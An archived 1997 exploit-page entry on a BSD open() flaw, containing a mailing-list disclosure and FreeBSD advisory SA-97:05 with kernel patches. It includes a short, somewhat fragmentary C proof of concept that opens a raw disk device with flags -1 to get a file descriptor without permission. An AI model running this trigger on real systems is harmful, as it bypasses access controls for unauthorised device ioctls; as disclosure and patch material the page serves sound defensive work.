open() on BSD succeeds and cedes valid fd with the argument "-1"

Description:You can't read a file you shouldn't be able to, but by feeding bad args to open, you can get a valid file descriptor and do inappropriate ioctl's to it. This is especially important for certain devices.
Compromise:DoS, possible other uses
Vulnerable Systems:*BSD
Date:17 October 1997

Date: Thu, 23 Oct 1997 10:04:42 -0500
From: Aleph One <>
Subject: Possible SERIOUS bug in open()?

[ This affects {Free,Net,Open}BSD. Joerg Wunsch fixed it yesterday in
  freebsd-current. - a1 ]

---------- Forwarded message ----------
Date: 17 Oct 1997 10:42:13 -0000
Subject: BoS: Possible SERIOUS bug in open()?

This was sent to me recently...  It seems to be a pretty serious hole
in open() and permissions...

Note, in the following, open() succeeds, and ioctls are probably

 * This will give you a file descriptor on a device you should not have
 * access to.  This seems really, really screwed up, since holding a fd
 * lets you do a lot of ioctls that you should not be able to do...
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <err.h>

main(int argc, char **argv)
  int fd;

  fd = open("/dev/rsd0a", -1, 0);

  if (fd < 0)
    err(1, "open");

From aleph1@DFW.NET Sat Nov 15 18:24:01 1997
Date: Wed, 29 Oct 1997 17:36:46 -0600
From: Aleph One 
Subject: FreeBSD Security Advisory:

X-Premail-Auth: Key matching expected Key ID 73D288A5 not found

---------- Forwarded message ----------
Date: Wed, 29 Oct 1997 20:01:00 +0100 (MET)
From: FreeBSD Security Officer 
To: freebsd-security-notifications@FreeBSD.ORG, freebsd-announce@FreeBSD.ORG,
Subject: FreeBSD Security Advisory:


FreeBSD-SA-97:05                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          security compromise via open()

Category:       core
Module:         kern
Announced:      1997-10-29
Affects:        FreeBSD 2.1.*, FreeBSD 2.2.*,
                FreeBSD-stable and FreeBSD-current
Corrected:      FreeBSD-current as of 1997/10/23 (partly even on 1997/04/14)
                FreeBSD-stable as of 1997/10/24
                FreeBSD 2.1-stable as of 1997/10/29
FreeBSD only:   yes



I.   Background

     In FreeBSD, the open() system call is used in normal file operations.
     When calling open(), the caller should specify if the file is
     to be opened for reading, for writing or for both.
     The right to reading from and/or writing to a file is controlled
     by the file's mode bits in the filesystem.
     In FreeBSD, open() is also used to obtain the right to do
     privileged io instructions.

II.  Problem Description

     A problem exists in the open() syscall that allows processes
     to obtain a valid file descriptor without having read or write
     permissions on the file being opened. This is normally not a
     problem. The FreeBSD way of obtaining the right to do io
     instructions however, is based on the right to open a specific
     file (/dev/io).

III. Impact

     The problem can be used by any user on the system to do unauthorised
     io instructions.

IV.  Workaround

     No workaround is available.

V.   Solution

     Apply the following patches. The first one in /usr/src/sys/kern,
     and the second one in /usr/src/sys/i386/i386,
     Rebuild your kernel, install it and reboot your system.

     patch 1:
     For FreeBSD-current before 1997/10/23:

     Index: vfs_syscalls.c
     RCS file: /home/cvsup/freebsd/CVS/src/sys/kern/vfs_syscalls.c,v
     retrieving revision 1.76
     retrieving revision 1.77
     diff -u -r1.76 -r1.77
     --- vfs_syscalls.c 1997/10/12 20:24:27     1.76
     +++ vfs_syscalls.c 1997/10/22 07:28:51     1.77
     @@ -863,11 +863,13 @@
        struct flock lf;
        struct nameidata nd;

     +  flags = FFLAGS(SCARG(uap, flags));
     +  if ((flags & FREAD + FWRITE) == 0)
     +          return (EINVAL);
        error = falloc(p, &nfp, &indx);
        if (error)
                return (error);
        fp = nfp;
     -  flags = FFLAGS(SCARG(uap, flags));
        cmode = ((SCARG(uap, mode) &~ fdp->fd_cmask) & ALLPERMS) &~ S_ISTXT;
        NDINIT(&nd, LOOKUP, FOLLOW, UIO_USERSPACE, SCARG(uap, path), p);
        p->p_dupfd = -indx - 1;                 /* XXX check for fdopen */

     For FreeBSD 2.1.* and 2.2.*:

     Index: vfs_syscalls.c
     RCS file: /home/cvsup/freebsd/CVS/src/sys/kern/vfs_syscalls.c,v
     retrieving revision
     diff -u -r1.51.2.5 vfs_syscalls.c
     --- vfs_syscalls.c 1997/10/01 06:23:48
     +++ vfs_syscalls.c 1997/10/28 22:04:43
     @@ -688,11 +688,13 @@
        struct flock lf;
        struct nameidata nd;

     +  flags = FFLAGS(uap->flags);
     +  if ((flags & FREAD + FWRITE) == 0)
     +          return (EINVAL);
        error = falloc(p, &nfp, &indx);
        if (error)
                return (error);
        fp = nfp;
     -  flags = FFLAGS(uap->flags);
        cmode = ((uap->mode &~ fdp->fd_cmask) & ALLPERMS) &~ S_ISTXT;
        NDINIT(&nd, LOOKUP, FOLLOW, UIO_USERSPACE, uap->path, p);
        p->p_dupfd = -indx - 1;                 /* XXX check for fdopen */

     patch 2:
     For FreeBSD 2.1.* and 2.2.* and For FreeBSD-current before 1997/04/14:

     Index: mem.c
     RCS file: /home/cvsup/freebsd/CVS/src/sys/i386/i386/mem.c,v
     retrieving revision 1.38
     retrieving revision
     diff -u -r1.38 -r1.38.2.1
     --- mem.c  1996/09/27 13:25:06     1.38
     +++ mem.c  1997/10/23 22:14:24
     @@ -169,6 +169,7 @@
        int fmt;
        struct proc *p;
     +  int error;
        struct trapframe *fp;

        switch (minor(dev)) {
     @@ -179,6 +180,11 @@
                return ENODEV;
        case 14:
     +          error = suser(p->p_ucred, &p->p_acflag);
     +          if (error != 0)
     +                  return (error);
     +          if (securelevel > 0)
     +                  return (EPERM);
                fp = (struct trapframe *)curproc->p_md.md_regs;
                fp->tf_eflags |= PSL_IOPL;

FreeBSD, Inc.

Web Site:             
Confidential contacts:
PGP Key:              
Security notifications:
Security public discussion:

Notice: Any patches in this document may not apply cleanly due to
        modifications caused by digital signature or mailer software.
        Please reference the URL listed at the top of this document
        for original copies of all patches if necessary.

Version: 2.6.2


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]